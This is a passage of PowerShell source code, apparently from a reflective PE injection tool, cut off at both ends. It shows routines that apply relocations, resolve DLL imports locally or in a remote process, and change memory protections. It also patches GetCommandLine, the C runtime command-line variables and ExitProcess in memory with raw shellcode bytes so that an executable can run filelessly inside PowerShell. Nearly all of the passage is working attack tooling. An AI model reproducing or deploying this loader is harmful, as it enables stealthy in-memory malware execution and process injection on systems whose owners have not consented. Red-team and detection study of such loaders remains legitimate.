32bit.\n\t\t\t\t    #This appears to be true for EXE's as well.\n\t\t\t\t    #\tSite: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx\n\t\t\t\t    if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `\n\t\t\t\t\t\t    -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))\n\t\t\t\t    {\t\t\t\n\t\t\t\t\t    #Get the current memory address and update it based off the difference between PE expected base address and actual base address\n\t\t\t\t\t    [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))\n\t\t\t\t\t    [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])\n\t\t\n\t\t\t\t\t    if ($AddDifference -eq $true)\n\t\t\t\t\t    {\n\t\t\t\t\t\t    [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n\t\t\t\t\t    }\n\t\t\t\t\t    else\n\t\t\t\t\t    {\n\t\t\t\t\t\t    [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n\t\t\t\t\t    }\t\t\t\t\n\n\t\t\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null\n\t\t\t\t    }\n\t\t\t\t    elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)\n\t\t\t\t    {\n\t\t\t\t\t    #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it\n\t\t\t\t\t    Throw \"Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo\"\n\t\t\t\t    }\n\t\t\t    }\n\t\t\t\n\t\t\t    $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))\n\t\t    }\n\t    }\n\n\n\t    Function Import-DllImports\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $PEInfo,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Functions,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Types,\n\t\t\n\t\t    [Parameter(Position = 3, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Constants,\n\t\t\n\t\t    [Parameter(Position = 4, Mandatory = $false)]\n\t\t    [IntPtr]\n\t\t    $RemoteProcHandle\n\t\t    )\n\t\t\n\t\t    $RemoteLoading = $false\n\t\t    if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)\n\t\t    {\n\t\t\t    $RemoteLoading = $true\n\t\t    }\n\t\t\n\t\t    if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n\t\t    {\n\t\t\t    [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\t\t\t\n\t\t\t    while ($true)\n\t\t\t    {\n\t\t\t\t    $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\t\t\t\t\n\t\t\t\t    #If the structure is null, it signals that this is the end of the array\n\t\t\t\t    if ($ImportDescriptor.Characteristics -eq 0 `\n\t\t\t\t\t\t    -and $ImportDescriptor.FirstThunk -eq 0 `\n\t\t\t\t\t\t    -and $ImportDescriptor.ForwarderChain -eq 0 `\n\t\t\t\t\t\t    -and $ImportDescriptor.Name -eq 0 `\n\t\t\t\t\t\t    -and $ImportDescriptor.TimeDateStamp -eq 0)\n\t\t\t\t    {\n\t\t\t\t\t    Write-Verbose \"Done importing DLL imports\"\n\t\t\t\t\t    break\n\t\t\t\t    }\n\n\t\t\t\t    $ImportDllHandle = [IntPtr]::Zero\n\t\t\t\t    $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))\n\t\t\t\t    $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n\t\t\t\t\n\t\t\t\t    if ($RemoteLoading -eq $true)\n\t\t\t\t    {\n\t\t\t\t\t    $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t\t    $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)\n\t\t\t\t    }\n\n\t\t\t\t    if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))\n\t\t\t\t    {\n\t\t\t\t\t    throw \"Error importing DLL, DLLName: $ImportDllPath\"\n\t\t\t\t    }\n\t\t\t\t\n\t\t\t\t    #Get the first thunk, then loop through all of them\n\t\t\t\t    [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)\n\t\t\t\t    [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk\n\t\t\t\t    [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\t\t\t\t\n\t\t\t\t    while ($OriginalThunkRefVal -ne [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t\t    $ProcedureName = ''\n\t\t\t\t\t    #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit\n\t\t\t\t\t    #\tIf the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint\n\t\t\t\t\t    #\tand doing the comparison, just see if it is less than 0\n\t\t\t\t\t    [IntPtr]$NewThunkRef = [IntPtr]::Zero\n\t\t\t\t\t    if([Int64]$OriginalThunkRefVal -lt 0)\n\t\t\t\t\t    {\n\t\t\t\t\t\t    $ProcedureName = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal\n\t\t\t\t\t    }\n\t\t\t\t\t    else\n\t\t\t\t\t    {\n\t\t\t\t\t\t    [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)\n\t\t\t\t\t\t    $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))\n\t\t\t\t\t\t    $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)\n\t\t\t\t\t    }\n\t\t\t\t\t\n\t\t\t\t\t    if ($RemoteLoading -eq $true)\n\t\t\t\t\t    {\n\t\t\t\t\t\t    [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionName $ProcedureName\n\t\t\t\t\t    }\n\t\t\t\t\t    else\n\t\t\t\t\t    {\n\t\t\t\t\t\t    [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddress.Invoke($ImportDllHandle, $ProcedureName)\n\t\t\t\t\t    }\n\t\t\t\t\t\n\t\t\t\t\t    if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)\n\t\t\t\t\t    {\n\t\t\t\t\t\t    Throw \"New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath\"\n\t\t\t\t\t    }\n\n\t\t\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)\n\t\t\t\t\t\n\t\t\t\t\t    $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n\t\t\t\t\t    [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n\t\t\t\t\t    [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\t\t\t\t    }\n\t\t\t\t\n\t\t\t\t    $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t    }\n\t\t    }\n\t    }\n\n\t    Function Get-VirtualProtectValue\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [UInt32]\n\t\t    $SectionCharacteristics\n\t\t    )\n\t\t\n\t\t    $ProtectionFlag = 0x0\n\t\t    if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)\n\t\t    {\n\t\t\t    if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n\t\t\t    {\n\t\t\t\t    if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t    {\n\t\t\t\t\t    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t\t    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ\n\t\t\t\t    }\n\t\t\t    }\n\t\t\t    else\n\t\t\t    {\n\t\t\t\t    if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t    {\n\t\t\t\t\t    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t\t    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE\n\t\t\t\t    }\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n\t\t\t    {\n\t\t\t\t    if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t    {\n\t\t\t\t\t    $ProtectionFlag = $Win32Constants.PAGE_READWRITE\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t\t    $ProtectionFlag = $Win32Constants.PAGE_READONLY\n\t\t\t\t    }\n\t\t\t    }\n\t\t\t    else\n\t\t\t    {\n\t\t\t\t    if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t    {\n\t\t\t\t\t    $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t\t    $ProtectionFlag = $Win32Constants.PAGE_NOACCESS\n\t\t\t\t    }\n\t\t\t    }\n\t\t    }\n\t\t\n\t\t    if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)\n\t\t    {\n\t\t\t    $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE\n\t\t    }\n\t\t\n\t\t    return $ProtectionFlag\n\t    }\n\n\t    Function Update-MemoryProtectionFlags\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $PEInfo,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Functions,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Constants,\n\t\t\n\t\t    [Parameter(Position = 3, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Types\n\t\t    )\n\t\t\n\t\t    for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n\t\t    {\n\t\t\t    [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n\t\t\t    $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)\n\t\t\t    [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)\n\t\t\t\n\t\t\t    [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics\n\t\t\t    [UInt32]$SectionSize = $SectionHeader.VirtualSize\n\t\t\t\n\t\t\t    [UInt32]$OldProtectFlag = 0\n\t\t\t    Test-MemoryRangeValid -DebugString \"Update-MemoryProtectionFlags::VirtualProtect\" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null\n\t\t\t    $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)\n\t\t\t    if ($Success -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw \"Unable to change memory protection\"\n\t\t\t    }\n\t\t    }\n\t    }\n\t\n\t    #This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE\n\t    #Returns an object with addresses to copies of the bytes that were overwritten (and the count)\n\t    Function Update-ExeFunctions\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $PEInfo,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Functions,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Constants,\n\t\t\n\t\t    [Parameter(Position = 3, Mandatory = $true)]\n\t\t    [String]\n\t\t    $ExeArguments,\n\t\t\n\t\t    [Parameter(Position = 4, Mandatory = $true)]\n\t\t    [IntPtr]\n\t\t    $ExeDoneBytePtr\n\t\t    )\n\t\t\n\t\t    #This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state.\n\t\t    $ReturnArray = @() \n\t\t\n\t\t    $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t    [UInt32]$OldProtectFlag = 0\n\t\t\n\t\t    [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"Kernel32.dll\")\n\t\t    if ($Kernel32Handle -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    throw \"Kernel32 handle null\"\n\t\t    }\n\t\t\n\t\t    [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke(\"KernelBase.dll\")\n\t\t    if ($KernelBaseHandle -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    throw \"KernelBase handle null\"\n\t\t    }\n\n\t\t    #################################################\n\t\t    #First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it.\n\t\t    #\tWe overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want.\n\t\t    $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n\t\t    $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n\t\n\t\t    [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineA\")\n\t\t    [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineW\")\n\n\t\t    if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    throw \"GetCommandLine ptr null. GetCommandLineA: $GetCommandLineAAddr. GetCommandLineW: $GetCommandLineWAddr\"\n\t\t    }\n\n\t\t    #Prepare the shellcode\n\t\t    [Byte[]]$Shellcode1 = @()\n\t\t    if ($PtrSize -eq 8)\n\t\t    {\n\t\t\t    $Shellcode1 += 0x48\t#64bit shellcode has the 0x48 before the 0xb8\n\t\t    }\n\t\t    $Shellcode1 += 0xb8\n\t\t\n\t\t    [Byte[]]$Shellcode2 = @(0xc3)\n\t\t    $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length\n\t\t\n\t\t\n\t\t    #Make copy of GetCommandLineA and GetCommandLineW\n\t\t    $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t    $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t    $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null\n\t\t    $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null\n\t\t    $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)\n\t\t    $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)\n\n\t\t    #Overwrite GetCommandLineA\n\t\t    [UInt32]$OldProtectFlag = 0\n\t\t    $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t    if ($Success = $false)\n\t\t    {\n\t\t\t    throw \"Call to VirtualProtect failed\"\n\t\t    }\n\t\t\n\t\t    $GetCommandLineAAddrTemp = $GetCommandLineAAddr\n\t\t    Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp\n\t\t    $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)\n\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)\n\t\t    $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize\n\t\t    Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp\n\t\t\n\t\t    $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t\n\t\t\n\t\t    #Overwrite GetCommandLineW\n\t\t    [UInt32]$OldProtectFlag = 0\n\t\t    $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t    if ($Success = $false)\n\t\t    {\n\t\t\t    throw \"Call to VirtualProtect failed\"\n\t\t    }\n\t\t\n\t\t    $GetCommandLineWAddrTemp = $GetCommandLineWAddr\n\t\t    Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp\n\t\t    $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)\n\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)\n\t\t    $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize\n\t\t    Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp\n\t\t\n\t\t    $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t    #################################################\n\t\t\n\t\t\n\t\t    #################################################\n\t\t    #For C++ stuff that is compiled with visual studio as \"multithreaded DLL\", the above method of overwriting GetCommandLine doesn't work.\n\t\t    #\tI don't know why exactly.. But the msvcr DLL that a \"DLL compiled executable\" imports has an export called _acmdln and _wcmdln.\n\t\t    #\tIt appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the\n\t\t    #\targv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported.\n\t\t    $DllList = @(\"msvcr70d.dll\", \"msvcr71d.dll\", \"msvcr80d.dll\", \"msvcr90d.dll\", \"msvcr100d.dll\", \"msvcr110d.dll\", \"msvcr70.dll\" `\n\t\t\t    , \"msvcr71.dll\", \"msvcr80.dll\", \"msvcr90.dll\", \"msvcr100.dll\", \"msvcr110.dll\")\n\t\t\n\t\t    foreach ($Dll in $DllList)\n\t\t    {\n\t\t\t    [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)\n\t\t\t    if ($DllHandle -ne [IntPtr]::Zero)\n\t\t\t    {\n\t\t\t\t    [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_wcmdln\")\n\t\t\t\t    [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_acmdln\")\n\t\t\t\t    if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t\t    \"Error, couldn't find _wcmdln or _acmdln\"\n\t\t\t\t    }\n\t\t\t\t\n\t\t\t\t    $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n\t\t\t\t    $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n\t\t\t\t\n\t\t\t\t    #Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state\n\t\t\t\t    $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])\n\t\t\t\t    $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])\n\t\t\t\t    $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t\t    $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)\n\t\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)\n\t\t\t\t    $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)\n\t\t\t\t    $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)\n\t\t\t\t\n\t\t\t\t    $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t\t\t    if ($Success = $false)\n\t\t\t\t    {\n\t\t\t\t\t    throw \"Call to VirtualProtect failed\"\n\t\t\t\t    }\n\t\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)\n\t\t\t\t    $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n\t\t\t\t\n\t\t\t\t    $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t\t\t    if ($Success = $false)\n\t\t\t\t    {\n\t\t\t\t\t    throw \"Call to VirtualProtect failed\"\n\t\t\t\t    }\n\t\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)\n\t\t\t\t    $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n\t\t\t    }\n\t\t    }\n\t\t    #################################################\n\t\t\n\t\t\n\t\t    #################################################\n\t\t    #Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits.\n\n\t\t    $ReturnArray = @()\n\t\t    $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process\n\t\t\n\t\t    #CorExitProcess (compiled in to visual studio c++)\n\t\t    [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke(\"mscoree.dll\")\n\t\t    if ($MscoreeHandle -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    throw \"mscoree handle null\"\n\t\t    }\n\t\t    [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, \"CorExitProcess\")\n\t\t    if ($CorExitProcessAddr -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"CorExitProcess address not found\"\n\t\t    }\n\t\t    $ExitFunctions += $CorExitProcessAddr\n\t\t\n\t\t    #ExitProcess (what non-managed programs use)\n\t\t    [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitProcess\")\n\t\t    if ($ExitProcessAddr -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"ExitProcess address not found\"\n\t\t    }\n\t\t    $ExitFunctions += $ExitProcessAddr\n\t\t\n\t\t    [UInt32]$OldProtectFlag = 0\n\t\t    foreach ($ProcExitFunctionAddr in $ExitFunctions)\n\t\t    {\n\t\t\t    $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr\n\t\t\t    #The following is the shellcode (Shellcode: ExitThread.asm):\n\t\t\t    #32bit shellcode\n\t\t\t    [Byte[]]$Shellcode1 = @(0xbb)\n\t\t\t    [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)\n\t\t\t    #64bit shellcode (Shellcode: ExitThread.asm)\n\t\t\t    if ($PtrSize -eq 8)\n\t\t\t    {\n\t\t\t\t    [Byte[]]$Shellcode1 = @(0x48, 0xbb)\n\t\t\t\t    [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)\n\t\t\t    }\n\t\t\t    [Byte[]]$Shellcode3 = @(0xff, 0xd3)\n\t\t\t    $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length\n\t\t\t\n\t\t\t    [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitThread\")\n\t\t\t    if ($ExitThreadAddr -eq [IntPtr]::Zero)\n\t\t\t    {\n\t\t\t\t    Throw \"ExitThread address not found\"\n\t\t\t    }\n\n\t\t\t    $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n\t\t\t    if ($Success -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw \"Call to VirtualProtect failed\"\n\t\t\t    }\n\t\t\t\n\t\t\t    #Make copy of original ExitProcess bytes\n\t\t\t    $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t\t    $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null\n\t\t\t    $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)\n\t\t\t\n\t\t\t    #Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then \n\t\t\t    #\tcall ExitThread\n\t\t\t    Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp\n\t\t\t    $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)\n\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)\n\t\t\t    $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n\t\t\t    Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp\n\t\t\t    $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)\n\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)\n\t\t\t    $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n\t\t\t    Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress 